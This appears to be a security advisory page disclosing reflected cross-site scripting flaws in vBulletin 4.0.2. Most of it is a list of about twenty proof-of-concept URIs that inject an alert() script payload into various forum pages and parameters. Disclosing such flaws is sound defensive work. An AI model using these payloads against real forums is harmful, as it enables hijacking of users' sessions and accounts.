|
|
vBulletin 4.0.2 Multiple Cross Site Scripting Vulnerabilities
To exploit these issues, an attacker must entice an unsuspecting victim into following a malicious URI. The following example URIs are available: http://www.example.com/upload/calendar.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt> http://www.example.com/upload/faq.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt> http://www.example.com/upload/forum.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt> http://www.example.com/upload/usercp.php/>"><ScRiPt>alert(213771818860)</ScRiPt> http://www.example.com/upload/subscription.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt> http://www.example.com/upload/showthread.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt> http://www.example.com/upload/showgroups.php/>"><ScRiPt>alert(213771818860)</ScRiPt> http://www.example.com/upload/sendmessage.php/>"><ScRiPt>alert(213771818860)</ScRiPt> http://www.example.com/upload/search.php/>"><ScRiPt>alert(213771818860)</ScRiPt> http://www.example.com/upload/register.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt> http://www.example.com/upload/profile.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt> http://www.example.com/upload/private.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt> http://www.example.com/upload/online.php/>"><ScRiPt>alert(213771818860)</ScRiPt> http://www.example.com/upload/newthread.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt> http://www.example.com/upload/misc.php/>"><ScRiPt>alert(213771818860)</ScRiPt> http://www.example.com/upload/memberlist.php?=>"'><ScRiPt>alert(213771818860)</ScRiPt> http://www.example.com/upload/member.php/>"><ScRiPt>alert(213771818860)</ScRiPt> http://www.example.com/upload/inlinemod.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt> http://www.example.com/upload/index.php/>"><ScRiPt>alert(213771818860)</ScRiPt> http://www.example.com/upload/forumdisplay.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt> |
|
Privacy Statement |